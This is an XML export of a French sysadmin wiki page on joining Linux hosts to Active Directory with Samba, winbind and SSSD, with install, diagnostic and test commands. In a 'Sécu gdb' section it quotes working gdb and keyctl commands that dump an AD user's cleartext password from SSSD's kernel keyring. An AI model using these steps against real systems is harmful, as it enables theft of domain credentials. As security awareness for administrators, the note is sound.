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onnexion_ad_active_directory_ldap"/><text:bookmark-start text:name="__RefHeading___connexion_ad_active_directory_ldap_1"/><text:bookmark-start text:name="connexion_ad_active_directory_ldap"/>Connexion AD Active Directory LDAP<text:bookmark-end text:name="__RefHeading___connexion_ad_active_directory_ldap_1"/><text:bookmark-end text:name="connexion_ad_active_directory_ldap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notes_windows_-_active_directory_ad_-_kerberos_-_winrm" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">Notes windows - Active Directory AD - Kerberos - WinRM</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> <text:a xlink:type="simple" xlink:href="http://wiki.c.belaris.fr/doku.php?id=tech:notes_sssd" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">Notes sssd</text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content_Last"> realmd (config possible depuis Cockpit)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Harden AD</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content_Last"> <text:a xlink:type="simple" xlink:href="http://wiki.c.belaris.fr/doku.php?id=tech:windows_-_active_directory_-_verifier_si_un_compte_ad_est_verrouille" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">Windows - Active Directory - Vérifier si un compte AD est verrouillé</text:a></text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="__RefHeading___note_install_2"/><text:bookmark-start text:name="note_install"/>Note install<text:bookmark-end text:name="__RefHeading___note_install_2"/><text:bookmark-end text:name="note_install"/></text:h>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Source_20_Text">/etc/security/limits.d/samba.conf</text:span></text:p>
      <text:p text:style-name="Preformatted_20_Text">#root soft nofile 16384<text:line-break/>#root hard nofile 16384<text:line-break/>root - nofile 16384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binfo <text:span text:style-name="highlight_re5">--ping-dc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et <text:span text:style-name="highlight_kw2">join</text:span> ads <text:span text:style-name="highlight_re5">-U</text:span> useradmin <text:span text:style-name="highlight_re5">-S</text:span> cd1-plop.mydomain.local <text:span text:style-name="highlight_re5">-d</text:span> <text:span text:style-name="highlight_nu0">3</text:span></text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:p text:style-name="Preformatted_20_Text"># wbinfo<text:s text:c="2"/>--own-domain<text:line-break/>MYDOMAIN</text:p>
      <text:h text:style-name="Heading_20_3" text:outline-level="3"><text:bookmark-start text:name="__RefHeading___secu_gdb_3"/><text:bookmark-start text:name="secu_gdb"/>Sécu gdb<text:bookmark-end text:name="__RefHeading___secu_gdb_3"/><text:bookmark-end text:name="secu_gdb"/></text:h>
      <text:p text:style-name="Text_20_body">Source : <text:a xlink:type="simple" xlink:href="https://gist.github.com/gladiatx0r/c52d529ea268f7e74295c2c492cf9774" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://gist.github.com/gladiatx0r/c52d529ea268f7e74295c2c492cf9774</text:a></text:p>
      <text:p text:style-name="Preformatted_20_Text">[domain/example.com]<text:line-break/>krb5_store_password_if_offline = true</text:p>
      <text:p text:style-name="Preformatted_20_Text">for who ever this interest, if you enable krb5_store_password_if_offline<text:s text:c="3"/>in the SSSD configuration, the AD password for accounts is stored in plaintext in the kernel keyring<text:line-break/>to dump the clear text password you can do :<text:line-break/><text:line-break/>```<text:line-break/>gdb -p &lt;PID_OF_SSSD&gt;<text:line-break/>call system("keyctl show &gt; /tmp/output")<text:line-break/>```<text:line-break/><text:line-break/>From the /tmp/output locate the key_id for the user you want<text:line-break/>Example of an output is : <text:line-break/>Session Keyring<text:line-break/> 204928979 --alswrv<text:s text:c="6"/>0<text:s text:c="5"/>0<text:s text:c="2"/>keyring: _ses<text:line-break/> 471547288 --alswrv<text:s text:c="6"/>0<text:s text:c="5"/>0<text:s text:c="3"/>\_ user: user@evilcorp.local<text:line-break/>now again in GDB do the following : <text:line-break/><text:line-break/>```<text:line-break/>call system("keyctl print 471547288 &gt; /tmp/output") # or whatever key_id from the past output<text:line-break/>```<text:line-break/><text:line-break/>enjoy the cleartext password in /tmp/output :)</text:p>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="__RefHeading___diag_4"/><text:bookmark-start text:name="diag"/>Diag<text:bookmark-end text:name="__RefHeading___diag_4"/><text:bookmark-end text:name="diag"/></text:h>
      <text:p text:style-name="Text_20_body">Diagnostic</text:p>
      <text:list text:style-name="List_20_1" text:continue-numbering="false">
        <text:list-item>
          <text:p text:style-name="List_20_1_Content_First"> stop smbd, nmbd and winbindd (make sure they are really dead using ps. winbindd still lingered after I stopped the service)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> delete the samba from the PDC (using the Management Console)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> delete the secrets database (/var/lib/samba/secrets.tdb)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content"> join the domain again</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="List_20_1_Content_Last"> start the daemons again (smbd, nmbd and winbindd)</text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="Text_20_body">Source : <text:a xlink:type="simple" xlink:href="https://ubuntuforums.org/showthread.php?t=1857135" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link">https://ubuntuforums.org/showthread.php?t=1857135</text:a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sssctl analyze request list <text:span text:style-name="highlight_re5">--pam</text:span></text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="__RefHeading___utilisations_diverses_5"/><text:bookmark-start text:name="utilisations_diverses"/>Utilisations diverses<text:bookmark-end text:name="__RefHeading___utilisations_diverses_5"/><text:bookmark-end text:name="utilisations_diverses"/></text:h>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="__RefHeading___pb_6"/><text:bookmark-start text:name="pb"/>Pb<text:bookmark-end text:name="__RefHeading___pb_6"/><text:bookmark-end text:name="pb"/></text:h>
      <text:h text:style-name="Heading_20_3" text:outline-level="3"><text:bookmark-start text:name="__RefHeading___pb_connexion_serveur_ad_ldap_7"/><text:bookmark-start text:name="pb_connexion_serveur_ad_ldap"/>Pb connexion serveur AD / LDAP<text:bookmark-end text:name="__RefHeading___pb_connexion_serveur_ad_ldap_7"/><text:bookmark-end text:name="pb_connexion_serveur_ad_ldap"/></text:h>
      <text:p text:style-name="Text_20_body">Active Directory</text:p>
      <text:p text:style-name="Text_20_body">Problème de connexion AD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0">/</text:span>etc<text:span text:style-name="highlight_sy0">/</text:span>init.d<text:span text:style-name="highlight_sy0">/</text:span>samba stop<text:line-break/><text:span text:style-name="highlight_sy0">/</text:span>etc<text:span text:style-name="highlight_sy0">/</text:span>init.d<text:span text:style-name="highlight_sy0">/</text:span>winbind stop<text:line-break/><text:span text:style-name="highlight_sy0">/</text:span>etc<text:span text:style-name="highlight_sy0">/</text:span>init.d<text:span text:style-name="highlight_sy0">/</text:span>winbind start<text:line-break/><text:span text:style-name="highlight_sy0">/</text:span>etc<text:span text:style-name="highlight_sy0">/</text:span>init.d<text:span text:style-name="highlight_sy0">/</text:span>samba start</text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="__RefHeading___tester_8"/><text:bookmark-start text:name="tester"/>Tester<text:bookmark-end text:name="__RefHeading___tester_8"/><text:bookmark-end text:name="tester"/></text:h>
      <text:p text:style-name="Text_20_body">Un compte particulier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getent</text:span> <text:span text:style-name="highlight_kw2">passwd</text:span> DOMAIN<text:span text:style-name="highlight_sy0">/</text:span>compteAD<text:line-break/><text:span text:style-name="highlight_kw2">id</text:span> compteAD</text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:p text:style-name="Text_20_body">Lister tous les comptes, les groupe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wbinfo <text:span text:style-name="highlight_re5">-u</text:span><text:line-break/>wbinfo <text:span text:style-name="highlight_re5">-g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53:59</meta:creation-date>
    <dc:creator>Generated</dc:creator>
    <dc:date>2026-07-21T19::53:59</dc:date>
    <dc:language>en-US</dc:language>
    <meta:editing-cycles>1</meta:editing-cycles>
    <meta:editing-duration>PT0S</meta:editing-duration>
    <dc:title>tech:connexion_ad_active_directory_ldap</dc:title>
  </office:meta>
</office:document-meta>
</file>